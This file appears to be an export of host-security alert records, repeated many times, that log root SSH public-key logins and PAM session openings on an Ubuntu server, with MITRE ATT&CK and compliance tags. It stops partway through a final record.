-{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication 